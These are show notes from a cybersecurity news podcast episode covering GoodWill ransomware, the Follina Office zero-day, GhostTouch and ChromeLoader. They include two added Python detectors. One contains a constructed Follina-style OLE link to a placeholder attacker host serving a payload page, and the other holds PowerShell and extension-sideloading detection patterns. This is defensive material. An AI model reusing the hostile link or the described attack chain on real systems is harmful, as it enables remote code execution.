CyberSecurity News Byte – Weekly

Hosted by Jim Guckin

Episode 20: May 31 2022

Ransomware demands acts of kindness to get your files back, Microsoft Office zero-day leaves researchers scrambling, Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely, Experts Warn of the rise in ChromeLoader Malware Hijacking Users’ Browsers

Bullet points of key topics + chapter markers
[00:36] Ransomware demands acts of kindness to get your files back
[09:05] Microsoft Office zero-day leaves researchers scrambling
[13:46] Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely
[18:32] Experts Warn of the rise in ChromeLoader Malware Hijacking Users’ Browsers

Links

https://www.tripwire.com/state-of-security/security-data-protection/ransomware-demands-acts-of-kindness-to-get-your-files-back/

https://www.cybersecuritydive.com/news/microsoft-office-zero-day/624604/

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

https://thehackernews.com/2022/05/attackers-can-use-electromagnetic.html

https://thehackernews.com/2022/05/experts-warn-of-rise-in-chromeloader.html

NOTES

Ransomware demands acts of kindness to get your files back

  • GoodWill ransomware
    • Reported by security firm CloudSEK
    • Isn’t interested in extorting money
    • Claims it wants victims to do something good for the world
  • Usual tactic
    • Encrypts the usual file types
      • documents
      • databases
      • photographs
      • videos
    • Does not charge money for the decryption key
      • Wants you to do something good instead
        • and provide video proof of it
  • Lock Screen
    • Our Aim The word “GoodWill” means to show kindness Story:- Team GoodWill is not hungry of Money and Wealth but kindness. We want to make every person on the planet to be kind and wants to give them a hard lesson to always help poor and needy people. So, all our victims need to be gentle and kind to get their files back. We know that you are very excited for the play. Take Deep breath and look all around for those who need help? You! No way, the only way to help yourself is to help others hope you understand
  • multi-page ransom note
    • three acts of goodwill
      • The first request is for you to donate new clothes and blankets to the homeless. Victims are told to make a video of them giving assistance to people sleeping rough, and to post it on their Facebook, Instagram, and WhatsApp to encourage others to help those in need.

      • The second requested act involves taking five poor children (under the age of 13) to Dominos, Pizza Hut, or KFC, and allowing them to order any food that they wish.
        • “Take some Selfies of them full of smiles and happy faces, Make a beautiful video story on this whole event and again post it on your Facebook and Instagram Stories with a photo frame and caption provided by us. Take a screenshot of your posts, snap of the restaurant’s bill and send an email to us with a valid post link, later our team will verify the whole case and promotes you for the next activity. Help those less fortunate than you, for it is real human existence.”
      • The final requested act of goodwill involves providing financial assistance to those who need urgent medical assistance, but cannot afford to pay for it themselves
        • Visit the nearest hospital in your area and observe the crowd around you inside the hospital premises. You will see that there will be some people who need a certain amount of money urgently for their medical treatment, but they are unable to arrange it due to any reason. You have to go near them and talk to them that they have been supported by you and they do not need to worry now, Finally Provide them maximum part of the required amount. Again, Take some Selfies of them full of smiles and happy faces, Record Audio while whole conversation between you and them and send it to us.
  • If you provide convincing evidence that you have done the good acts
    • they will provide a decryption tool
      • with the key and a video tutorial

Microsoft Office zero-day leaves researchers scrambling

  • Dubbed “Follina”
    • Discovered on May 27th by the research team nao_sec
    • CVE-2022-30190
    • Affects all current versions of Office, including Office 365; when the document is delivered as an .RTF file it can trigger from the Windows Explorer preview pane without the user opening it
  • A crafted Office document abuses the ms-msdt: URL protocol handler to launch the Microsoft Support Diagnostic Tool (MSDT), which then runs attacker-supplied PowerShell
    • After phishing or social engineering gets a user to open the attachment, the attacker has code execution as that user and can use it to establish persistence, move laterally and escalate privileges on the system
    • The document’s external OLE object link fetches a remote HTML page, and that page invokes the “ms-msdt:” URI with a crafted parameter that executes PowerShell
  • Microsoft issued guidance on the vulnerability
    • The attacker can install programs, view, change or delete data, or create new accounts in the context allowed by the user’s rights
    • No patch at the time of recording
    • Recommended workaround: disable the MSDT URL protocol by backing up and then deleting the HKEY_CLASSES_ROOT\ms-msdt registry key
    • Customers with Microsoft Defender Antivirus should turn on cloud-delivered protection and automatic sample submission, which Microsoft says use machine learning to identify and stop new and unknown threats
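As an added example (not from the podcast, from Microsoft’s guidance, or from nao_sec’s analysis), here is a small Python scanner for the document shape described above: an OLE object relationship in the .docx package whose Target is an external URL instead of an embedded part, plus a byte search for the ms-msdt: URI to cover non-OOXML files such as RTF. The sample packages and the attacker.example hostname are constructed for the demo; a real document would also need a hostile HTML page at the other end of that link, which this scanner deliberately does not fetch.

```python
# Added example (not from the podcast or Microsoft's guidance): scan a .docx
# for the Follina (CVE-2022-30190) delivery pattern, an OLE object relationship
# whose Target is an external URL, plus any literal "ms-msdt:" URI in the file.
# The sample documents below are constructed inline for the demo.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
MSDT_URI = re.compile(rb"ms-msdt:", re.IGNORECASE)


def scan_office_file(data: bytes) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    if not zipfile.is_zipfile(io.BytesIO(data)):
        # Not an OOXML package (e.g. an .rtf): fall back to a plain byte search.
        if MSDT_URI.search(data):
            findings.append("raw file: contains ms-msdt: URI")
        return findings
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            blob = pkg.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(blob)
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    # A normal OLE object is an internal part; Follina points
                    # the relationship at a remote URL instead.
                    if (rel.get("Type") == OLE_REL_TYPE
                            and rel.get("TargetMode") == "External"):
                        findings.append(
                            f"{name}: external OLE object -> {rel.get('Target')}")
            if MSDT_URI.search(blob):
                findings.append(f"{name}: contains ms-msdt: URI")
    return findings


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal (constructed) .docx package around the given rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("word/document.xml", "<document/>")
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed relationship parts. The hostile one mirrors the Follina shape:
# an oleObject relationship that points at a remote HTML page instead of an
# embedded part. attacker.example is a placeholder, not a real indicator.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
</Relationships>"""

HOSTILE_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="http://attacker.example/payload.html!" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("hostile", HOSTILE_RELS)):
        print(label, scan_office_file(build_docx(rels)) or "clean")
```

Run it against quarantined attachments rather than live mail flow: the external relationship check is a structural indicator and will also fire on legitimate documents that link remote OLE content, so treat a hit as a triage lead, and remember that the registry workaround above is what actually stops msdt.exe from being reached.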

Attackers Can Use Electromagnetic Signals to Control Touchscreens Remotely

  • Called “GhostTouch”
    • Demonstrated by academic researchers from Zhejiang University and the Technical University of Darmstadt
    • Described as the “first active contactless attack against capacitive touchscreens”
    • “uses electromagnetic interference (EMI) to inject fake touchpoints into a touchscreen without the need to physically touch it”
  • The idea is to use electromagnetic signals to inject basic touch events
    • such as taps and swipes
      • at targeted locations on the touchscreen
    • Works from a distance of up to 40 mm
  • Relies on the fact that capacitive touchscreens are sensitive to EMI
  • The attack setup uses an electrostatic gun
    • to generate a strong pulse signal, which is fed to an antenna
    • the antenna couples an electromagnetic field into the phone’s touchscreen
    • the screen’s electrodes
      • which act as antennas themselves
      • pick up the EMI, and the touch controller registers it as a touch
    • tuning the signal and the antenna produces different touch behaviours, such as press-and-hold and swipe-to-select
  • “In places like a cafe, library, meeting room, or conference lobbies, people might place their smartphone face-down on the table,” the researchers said. “An attacker may embed the attacking equipment under the table and launch attacks remotely.”
  • Nine tested smartphone models were found vulnerable to GhostTouch:
    • Galaxy A10s
    • Huawei P30 Lite
    • Honor View 10
    • Galaxy S20 FE 5G
    • Nexus 5X
    • Redmi Note 9S
    • Nokia 7.2
    • Redmi 8
    • iPhone SE (2020)
  • Defense
    • The researchers recommend adding electromagnetic shielding to block EMI
    • and prompting users to enter the phone’s PIN, or verify their face or fingerprint, before executing high-risk actions

Experts warn of the rise in ChromeLoader malware hijacking users’ browsers

  • ChromeLoader
    • A rogue Chrome browser extension
      • Typically distributed as ISO files via pay-per-install sites
      • and via baited social media posts that advertise QR codes leading to cracked video games and pirated movies
      • Its purpose is to earn revenue through unsolicited advertisements and search-engine hijacking
      • Researchers have also detected a macOS version of the malware that targets both Chrome and Safari
    • The malvertising threat has seen a new surge in activity since it first emerged earlier this year
    • A pervasive and persistent browser hijacker that modifies victims’ browser settings and redirects their traffic to advertising websites
  • Primary functions
    • Hijacks user search queries to Google, Yahoo, and Bing and redirects the traffic to an advertising site
    • Uses PowerShell, launched from the ISO, to download the extension and force-load it into Chrome
  • Evasion trick
    • If the victim tries to remove the add-on, the extension redirects them away from the Chrome extensions page (“chrome://extensions”)
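As an added example (not from the podcast or from any vendor write-up on ChromeLoader), the following Python decodes a PowerShell -EncodedCommand payload out of a process command line, the way you would when reviewing process-creation logs, and flags the ChromeLoader-style behaviours the notes describe: a hidden PowerShell window and Chrome being launched with a side-loaded extension. The sample command line is constructed here, and the indicator list is an assumption for illustration rather than a vetted detection signature.

```python
# Added example (not from the podcast or any vendor report): decode the
# -EncodedCommand payload of a PowerShell command line, then look for the
# ChromeLoader-style indicators the episode describes (hidden PowerShell
# window, Chrome launched with a side-loaded extension). The sample command
# line is constructed here for the demo; the indicator list is illustrative.
import base64
import binascii
import re
from typing import Optional

# Each pattern is run over the outer command line and the decoded script.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "load_extension": re.compile(r"--load-extension", re.I),
    "launches_chrome": re.compile(r"chrome(\.exe)?", re.I),
    "scheduled_task": re.compile(r"schtasks|Register-ScheduledTask", re.I),
}


def is_encoded_flag(token: str) -> bool:
    """PowerShell accepts -e, -ec and any prefix of -EncodedCommand of 2+ letters."""
    flag = token.lower().lstrip("-/")
    return flag in {"e", "ec"} or (len(flag) >= 2 and "encodedcommand".startswith(flag))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if is_encoded_flag(flag):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def analyze_cmdline(cmdline: str) -> dict:
    """Decode the command line and return the sorted list of indicator names hit."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    if decoded is not None:
        hits.append("encoded_command")
    return {"decoded": decoded, "indicators": sorted(hits)}


# Constructed sample: what a ChromeLoader-style launcher might hand to
# powershell.exe. The extension path is a placeholder, not a real indicator.
SAMPLE_SCRIPT = ("Start-Process chrome.exe -ArgumentList "
                 "'--load-extension=C:\\Users\\Public\\ext'")
SAMPLE_CMDLINE = ("powershell.exe -WindowStyle Hidden -enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"))

if __name__ == "__main__":
    result = analyze_cmdline(SAMPLE_CMDLINE)
    print("decoded:", result["decoded"])
    print("indicators:", ", ".join(result["indicators"]) or "none")
```

Encoded commands alone are not malicious, so alert on the combination (hidden window plus a browser launched with --load-extension) rather than on any single hit, and decode before matching: none of these strings are visible in the base64 form that lands in the raw process-creation event.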
